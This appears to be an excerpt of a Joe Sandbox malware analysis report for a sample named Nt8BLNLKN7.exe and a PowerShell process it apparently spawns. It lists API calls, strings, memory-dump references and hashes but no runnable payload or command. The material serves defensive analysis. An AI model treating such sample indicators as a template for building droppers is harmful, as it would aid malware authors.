Associated: 00000000.00000002.1227841229.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227942309.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227942309.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Nt8BLNLKN7.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s$reckling: Installing
API String ID: 3540041739-1892743964
Opcode ID: f5b98b0d34bd8af263c471b1c7f50a8620f0df1661be5b3956b6e442e3dfe167
Instruction ID: 1dbe8f306e20f990bcdfb4b2d97c48a080c9d40feb998d0653c6b80998781608
Opcode Fuzzy Hash: f5b98b0d34bd8af263c471b1c7f50a8620f0df1661be5b3956b6e442e3dfe167
Instruction Fuzzy Hash: CE11347360012437CB1062699C49EEF3249CBC2334F24823BFA25F71D1E9788C5282E8

Function 00401CCC Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?), ref: 00401CD0
GetClientRect.USER32(00000000,?), ref: 00401CDD
LoadImageA.USER32(?,00000000,?,?,?,?), ref: 00401CFE
SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D0C
DeleteObject.GDI32(00000000), ref: 00401D1B

Memory Dump Source

Source File: 00000000.00000002.1227807081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1227793485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227826951.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227942309.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227942309.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Nt8BLNLKN7.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: 729fc4278e862243959d7ad856f7c73244b6852cfe4ffc3fdd7b269795ac9902
Instruction ID: 68903ef9478fc0d920f95a79cd5396482650d24808bb52901199de5d2149753e
Opcode Fuzzy Hash: 729fc4278e862243959d7ad856f7c73244b6852cfe4ffc3fdd7b269795ac9902
Instruction Fuzzy Hash: 06F062B2A05114BFD701DBA4EE88CAF77BCEB44301B008576F501F2091C7389D019B79

Function 00401BB8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76windowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C18
SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C30

Strings

!, xrefs: 00401BEC

Memory Dump Source

Source File: 00000000.00000002.1227807081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1227793485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227826951.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227942309.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227942309.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Nt8BLNLKN7.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: 223d8f7865d2b1dd0e95bc8f55079009c40be9e2a37a1be7db68750e4265ac19
Instruction ID: c8505a4ed1fbcfe48898eca751f608fe424cacc25c72cee6cab93c7adb8e4515
Opcode Fuzzy Hash: 223d8f7865d2b1dd0e95bc8f55079009c40be9e2a37a1be7db68750e4265ac19
Instruction Fuzzy Hash: 742190B1A44208BFEF41AFB4CD4AAAE7BB5EF40344F14453EF541B61D1D6B89A40E728

Function 00403A4C Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 71COMMON

Download Yara Rule

APIs

SetWindowTextA.USER32(00000000,00422F00), ref: 00403AE4

Strings

1033, xrefs: 00403A50, 00403A5A, 00403ACB
reckling: Installing, xrefs: 00403A4F
"C:\Users\user\Desktop\Nt8BLNLKN7.exe", xrefs: 00403A4D

Memory Dump Source

Source File: 00000000.00000002.1227807081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1227793485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227826951.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227942309.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227942309.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Nt8BLNLKN7.jbxd

Similarity

API ID: TextWindow
String ID: "C:\Users\user\Desktop\Nt8BLNLKN7.exe"$1033$reckling: Installing
API String ID: 530164218-3275426899
Opcode ID: a6da78400ff3a739add250f1f250e28a516849dfe05be90d189a17623cbbcb69
Instruction ID: afbb14256cc631d10caee281dea517f3a5a89f89e2cd0ba730366887019fa8a8
Opcode Fuzzy Hash: a6da78400ff3a739add250f1f250e28a516849dfe05be90d189a17623cbbcb69
Instruction Fuzzy Hash: A411C2B1B04610ABC724DF15DC8092377BDEB84716328813BA84167391C63D9E029A98

Function 00405781 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(?,C:\Users\user~1\AppData\Local\Temp\,00403201,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,771B3410,004033C9), ref: 00405787
CharPrevA.USER32(?,00000000,?,C:\Users\user~1\AppData\Local\Temp\,00403201,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,771B3410,004033C9), ref: 00405790
lstrcatA.KERNEL32(?,00409014), ref: 004057A1

Strings

C:\Users\user~1\AppData\Local\Temp\, xrefs: 00405781

Memory Dump Source

Source File: 00000000.00000002.1227807081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1227793485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227826951.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227942309.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227942309.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Nt8BLNLKN7.jbxd

Similarity

API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user~1\AppData\Local\Temp\
API String ID: 2659869361-2382934351
Opcode ID: 890135f98a5a9138db31eb4b1572133a55ea61a04d2c03425938916b0e2dddc9
Instruction ID: 5d0f413141f52f4d8e8af186490daeb449751c8a1e5703fa5fe58453a807c488
Opcode Fuzzy Hash: 890135f98a5a9138db31eb4b1572133a55ea61a04d2c03425938916b0e2dddc9
Instruction Fuzzy Hash: A4D0C9A2A059306AD3122655AC09F9B6A48CF56755B099077F200B62A2C67C5D418FFE

Function 00401EDC Relevance: 6.1, APIs: 4, Instructions: 54memoryCOMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeA.VERSION(00000000,?,000000EE), ref: 00401EEB
GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401F09
GetFileVersionInfoA.VERSION(?,?,?,00000000), ref: 00401F22
VerQueryValueA.VERSION(?,00409014,?,?,?,?,?,00000000), ref: 00401F3B

Part of subcall function 00405C4F: wsprintfA.USER32 ref: 00405C5C

Memory Dump Source

Source File: 00000000.00000002.1227807081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1227793485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227826951.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227942309.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227942309.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Nt8BLNLKN7.jbxd

Similarity

API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
String ID:
API String ID: 1404258612-0
Opcode ID: 88a471159faddf61ff8bf6f6ba4e081a66ca77f756c37004028b55345f5afde9
Instruction ID: daf777410944a799184fcc454f008e4928398c379a2567b3caca2a2cde185cee
Opcode Fuzzy Hash: 88a471159faddf61ff8bf6f6ba4e081a66ca77f756c37004028b55345f5afde9
Instruction Fuzzy Hash: 1B115EB1900208BEDB01EFA5D941DAEBBB9EF04344B20807AF505F61A1D7389E54EB28

Function 00404F50 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00404F7F
CallWindowProcA.USER32(?,?,?,?), ref: 00404FD0

Part of subcall function 00404038: SendMessageA.USER32(00010420,00000000,00000000,00000000), ref: 0040404A

Strings

, xrefs: 00404F60

Memory Dump Source

Source File: 00000000.00000002.1227807081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1227793485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227826951.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227942309.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227942309.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Nt8BLNLKN7.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: cc2ac9f72c883015c9b8c7a8e8247984937158d827f98eb0f0cc4c523cd7d41f
Instruction ID: e4ca6dfb8be9ac33f077af52de3e350fef620c5d1e65b576c63f1805fc4ef9c4
Opcode Fuzzy Hash: cc2ac9f72c883015c9b8c7a8e8247984937158d827f98eb0f0cc4c523cd7d41f
Instruction Fuzzy Hash: 1801D4B160420AAFDF209F50DD80A9B3B66FBC0315F144137FB00B52D1D7398C51A669

Function 004024D1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34filestringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,00000011), ref: 004024EF
WriteFile.KERNEL32(00000000,?,incarnations\Vaporized\hippogriff,00000000,?,?,00000000,00000011), ref: 0040250E

Strings

incarnations\Vaporized\hippogriff, xrefs: 004024DD, 00402502

Memory Dump Source

Source File: 00000000.00000002.1227807081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1227793485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227826951.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227942309.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227942309.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Nt8BLNLKN7.jbxd

Similarity

API ID: FileWritelstrlen
String ID: incarnations\Vaporized\hippogriff
API String ID: 427699356-2641171360
Opcode ID: 53fcb9ea17851b1946f2fbb0747d3ea60ceac84847df1dd1eb9518da16ae72a6
Instruction ID: 15837e18a0899aebe372c1c9672940312f560d5d25332acc002067b6f94eb92f
Opcode Fuzzy Hash: 53fcb9ea17851b1946f2fbb0747d3ea60ceac84847df1dd1eb9518da16ae72a6
Instruction Fuzzy Hash: 78F089B2A54244BFDB40EBB09E499EB76A4DB50305F14443FF141F61C2D6FC4941A76E

Function 004036F2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,C:\Users\user~1\AppData\Local\Temp\,00000000,771B2EE0,004036C9,771B3410,004034D6,?), ref: 0040370C
GlobalFree.KERNEL32(00000000), ref: 00403713

Strings

C:\Users\user~1\AppData\Local\Temp\, xrefs: 00403704

Memory Dump Source

Source File: 00000000.00000002.1227807081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1227793485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227826951.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227942309.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227942309.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Nt8BLNLKN7.jbxd

Similarity

API ID: Free$GlobalLibrary
String ID: C:\Users\user~1\AppData\Local\Temp\
API String ID: 1100898210-2382934351
Opcode ID: 86ea4e8f2e330b4051334ac2fa91e3adcb647da4565bec0431381526e270e322
Instruction ID: 0fe4964e98027e88380181352afc78dea88c0f551701ba437740c6db36bc47f5
Opcode Fuzzy Hash: 86ea4e8f2e330b4051334ac2fa91e3adcb647da4565bec0431381526e270e322
Instruction Fuzzy Hash: 0EE0EC7390512097C6215F96AD04B5ABB686B89B62F06842AED407B3A18B746C418BD9

Function 004057C8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402CE5,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Nt8BLNLKN7.exe,C:\Users\user\Desktop\Nt8BLNLKN7.exe,80000000,00000003), ref: 004057CE
CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402CE5,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Nt8BLNLKN7.exe,C:\Users\user\Desktop\Nt8BLNLKN7.exe,80000000,00000003), ref: 004057DC

Strings

C:\Users\user\Desktop, xrefs: 004057C8

Memory Dump Source

Source File: 00000000.00000002.1227807081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1227793485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227826951.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227942309.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227942309.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Nt8BLNLKN7.jbxd

Similarity

API ID: CharPrevlstrlen
String ID: C:\Users\user\Desktop
API String ID: 2709904686-3976562730
Opcode ID: c27a981e79bb352b20b7a8c74a9367836393bd04b8b6ccbc39cacac652a51138
Instruction ID: f40007591d3941cd74726badf399ab62381001b9e0dca56ace991d14a2ccaf85
Opcode Fuzzy Hash: c27a981e79bb352b20b7a8c74a9367836393bd04b8b6ccbc39cacac652a51138
Instruction Fuzzy Hash: 4BD0A7B280CD705FF30352109C04B8F6A48CF16310F094063E040A71D0C2781C414BFD

Function 004058E7 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405B16,00000000,[Rename],00000000,00000000,00000000), ref: 004058F7
lstrcmpiA.KERNEL32(00405B16,00000000), ref: 0040590F
CharNextA.USER32(00405B16,?,00000000,00405B16,00000000,[Rename],00000000,00000000,00000000), ref: 00405920
lstrlenA.KERNEL32(00405B16,?,00000000,00405B16,00000000,[Rename],00000000,00000000,00000000), ref: 00405929

Memory Dump Source

Source File: 00000000.00000002.1227807081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1227793485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227826951.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227841229.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227942309.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1227942309.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Nt8BLNLKN7.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: 0add82ed76356020c4ee8264c56a6ad6875436601f5ed096891bbb40787d2247
Instruction ID: 42f6177a7bbf9ad164fe3de6883cfd7493767cce72774148ee1a9d65a6b1b045
Opcode Fuzzy Hash: 0add82ed76356020c4ee8264c56a6ad6875436601f5ed096891bbb40787d2247
Instruction Fuzzy Hash: 87F06236604558FFC7129FA5DD4099EBBA8EF16360B2540A9E800F7260D674EE01ABA9

Analysis Process: powershell.exePID: 6216, Parent PID: 6992COMMON

Executed Functions

Function 07B34AA8 Relevance: 33.6, Strings: 26, Instructions: 1099COMMON

Download Yara Rule

Strings

4'q, xrefs: 07B35502
4'q, xrefs: 07B35114
4'q, xrefs: 07B35264
4'q, xrefs: 07B35060
"m, xrefs: 07B34BE3
4'q, xrefs: 07B351B0
"m, xrefs: 07B34BD9
4'q, xrefs: 07B35258
4'q, xrefs: 07B35776
4'q, xrefs: 07B3576A
4'q, xrefs: 07B35303
4'q, xrefs: 07B3530F
(f,m, xrefs: 07B35A3E
4'q, xrefs: 07B354F6
4'q, xrefs: 07B34DD2
4'q, xrefs: 07B34D2A
4'q, xrefs: 07B34D1E
4'q, xrefs: 07B34DC6
4'q, xrefs: 07B34F25
4'q, xrefs: 07B3506C
4'q, xrefs: 07B34F19
(f,m, xrefs: 07B35A34
4'q, xrefs: 07B34E7D
4'q, xrefs: 07B35108
4'q, xrefs: 07B351BC
4'q, xrefs: 07B34E71

Memory Dump Source

Source File: 00000002.00000002.1532308390.0000000007B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7b30000_powershell.jbxd

Similarity

API ID:
String ID: (f,m$(f,m$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$"m$"m
API String ID: 0-892796536
Opcode ID: 761633779587b73ffc460a75d547a4c762269d8802c555e54259a02ed43e0e24
Instruction ID: 56254157599bc27770487203a94f99364f1d4dc9666fecd9fcefe1ffeeffcc01
Opcode Fuzzy Hash: 761633779587b73ffc460a75d547a4c762269d8802c555e54259a02ed43e0e24
Instruction Fuzzy Hash: F0A251B4B50204DFE724CB64C454B9ABBB2FF88305F648199E905AB346CB72ED85CF91

Function 07B34A88 Relevance: 15.9, Strings: 12, Instructions: 885COMMON

Download Yara Rule

Strings

4'q, xrefs: 07B35060
4'q, xrefs: 07B3576A
4'q, xrefs: 07B34DC6
4'q, xrefs: 07B35303
4'q, xrefs: 07B34F19
4'q, xrefs: 07B354F6
4'q, xrefs: 07B351B0
"m, xrefs: 07B34BD9
4'q, xrefs: 07B35108
4'q, xrefs: 07B34E71
4'q, xrefs: 07B34D1E
4'q, xrefs: 07B35258

Memory Dump Source

Source File: 00000002.00000002.1532308390.0000000007B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7b30000_powershell.jbxd

Similarity

API ID:
String ID: 4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$"m
API String ID: 0-3823859178
Opcode ID: 47a2f0f19d05e2aa95904cfbed1cb3dd67901b5e9a379ac6b7911c53883a58c3
Instruction ID: 10c637a4131a304359671f91a82fabac277392d358cb45a5b4d9fde7daa34714
Opcode Fuzzy Hash: 47a2f0f19d05e2aa95904cfbed1cb3dd67901b5e9a379ac6b7911c53883a58c3
Instruction Fuzzy Hash: 2F8250B4B50204DFE724CB64C455B9ABBB2FF88305F648199E9056B382CB72ED85CF91

Function 07B30840 Relevance: 11.5, Strings: 9, Instructions: 209COMMON

Download Yara Rule

Strings

$q, xrefs: 07B308BB
4'q, xrefs: 07B308E0
$q, xrefs: 07B308AF
4'q, xrefs: 07B308D4
$q, xrefs: 07B30893
4'q, xrefs: 07B30A65
"m, xrefs: 07B30AA9
4'q, xrefs: 07B30A55
"m, xrefs: 07B30A9B

Memory Dump Source

Source File: 00000002.00000002.1532308390.0000000007B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7b30000_powershell.jbxd

Similarity

API ID:
String ID: 4'q$4'q$4'q$4'q$$q$$q$$q$"m$"m
API String ID: 0-789079392
Opcode ID: 3a277b8bacf6138ece9ad272d158bc17af2748b514caf78a178c03a0944ed7ea
Instruction ID: d05f0fbacebfc80f66a6d93b70b4d06eab17a2621ee7d6535c6f8b5359657572
Opcode Fuzzy Hash: 3a277b8bacf6138ece9ad272d158bc17af2748b514caf78a178c03a0944ed7ea
Instruction Fuzzy Hash: 745109F170030A9FFB24AB79941577BBBA3EFC5211F1481BAE945CB241DA31D882C7A1

Function 07B33610 Relevance: 10.7, Strings: 8, Instructions: 708COMMON

Download Yara Rule

Strings

4'q, xrefs: 07B33D66
4'q, xrefs: 07B33D5A
4'q, xrefs: 07B347D8
(f,m, xrefs: 07B34571
4'q, xrefs: 07B34765
4'q, xrefs: 07B34759
(f,m, xrefs: 07B3457B
4'q, xrefs: 07B347E4

Memory Dump Source

Source File: 00000002.00000002.1532308390.0000000007B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7b30000_powershell.jbxd

Similarity

API ID:
String ID: (f,m$(f,m$4'q$4'q$4'q$4'q$4'q$4'q
API String ID: 0-2857025177
Opcode ID: 3f2e4cff06ca28e135cb071b5cc26eb3495575e3a5ad4edc1f313c2e973cccfb
Instruction ID: 1fd622a3b227c816b5e50b42152afcf73cf2fb3a74f681fc1a883b52aa2f0033
Opcode Fuzzy Hash: 3f2e4cff06ca28e135cb071b5cc26eb3495575e3a5ad4edc1f313c2e973cccfb
Instruction Fuzzy Hash: 965260B4B002089FE754CB58C854F6ABBB2FB89305F11C199DA099F395CB72ED85CB91

Function 07B31422 Relevance: 5.4, Strings: 4, Instructions: 424COMMON

Download Yara Rule

Strings

4'q, xrefs: 07B31596
4'q, xrefs: 07B31818
4'q, xrefs: 07B315A2
4'q, xrefs: 07B31824

Memory Dump Source

Source File: 00000002.00000002.1532308390.0000000007B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B30000, based on PE: false

Joe Sandbox IDA Plugin

